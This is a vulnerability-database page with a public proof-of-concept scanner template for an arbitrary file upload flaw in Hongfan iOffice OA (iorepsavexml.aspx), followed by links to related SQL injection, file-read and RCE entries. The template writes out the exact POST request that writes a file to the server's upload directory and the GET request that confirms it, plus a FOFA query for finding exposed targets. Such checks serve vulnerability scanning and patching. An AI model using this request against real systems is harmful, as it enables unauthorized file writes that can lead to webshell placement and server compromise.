hongfan-oa-iorepsavexml-file-upload: 红帆OA iorepsavexml.aspx 任意文件上传

漏洞描述

PoC代码[已公开]

id: hongfan-oa-iorepsavexml-file-upload

info:
  name: 红帆OA iorepsavexml.aspx 任意文件上传
  author: Observer
  severity: critical
  verified: true
  description: |
    FOFA: app="红帆-ioffice"
  reference:
    - https://github.com/FridaZhbk/pocscan/blob/ee0c74e68ec95b82a4e4ebcdb961d6ed18a44b77/%E7%BA%A2%E5%B8%86/oa%E7%BA%A2%E5%B8%86ioAssistance.asmx%E6%B3%A8%E5%85%A5RCE.py#L47
  tags: hongfan,oa,rce
  created: 2023/06/25

set:
  randstr: randomLowercase(10)
  randbody: randomLowercase(32)
rules:
  r0:
    request:
      method: POST
      path: /iOffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename={{randstr}}.txt&filepath=/upfiles/rep/pic/
      body: |
        {{randbody}}
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /iOffice/upfiles/rep/pic/{{randstr}}.txt
    expression: response.status == 200  && response.body.bcontains(bytes(randbody))
expression: r0() && r1()

相关漏洞推荐

• ioffice-oa-iofileexport-read-file: 红帆OA ioFileExport.aspx 任意文件读取漏洞 POC

  2025-09-01 | 红帆OA
  红帆OA ioFileExport.aspx文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器敏感信息 FOFA: app="红帆-ioffice" ZoomEye: app:...

• ioffice-oa-udfmr-asmx-sql-inject: 红帆OA udfmr.asmx SQL注入漏洞 POC

  2025-09-01 | 红帆OA
  红帆iOffice.net udfmr.asmx处存在SQL注入漏洞，攻击者可以从其中获取数据库权限。 fofa：app="红帆-ioffice"

• 红帆OA NetCAUserLogin.aspx 存在SQL注入漏洞 POC

  2025-07-29 | 红帆OA
  红帆OA NetCAUserLogin.aspx存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

• hongfan-oa-ioassistance-rce: 红帆OA ioAssistance.asmx 注入RCE POC

  2025-09-01 | hongfan-oa-ioassistance-rce
  FOFA: app="红帆-ioffice"

• LemonLDAP::NG 操作系统命令注入漏洞 无POC

  2025-09-20 00:03:21 | LemonLDAP::NG
  LemonLDAP::NG是LemonLDAP::NG开源的一套Web单点登录和访问管理软件。 LemonLDAP::NG 2.16.7之前版本和2.17版本至2.21.3之前版本存在操作系统命令注入...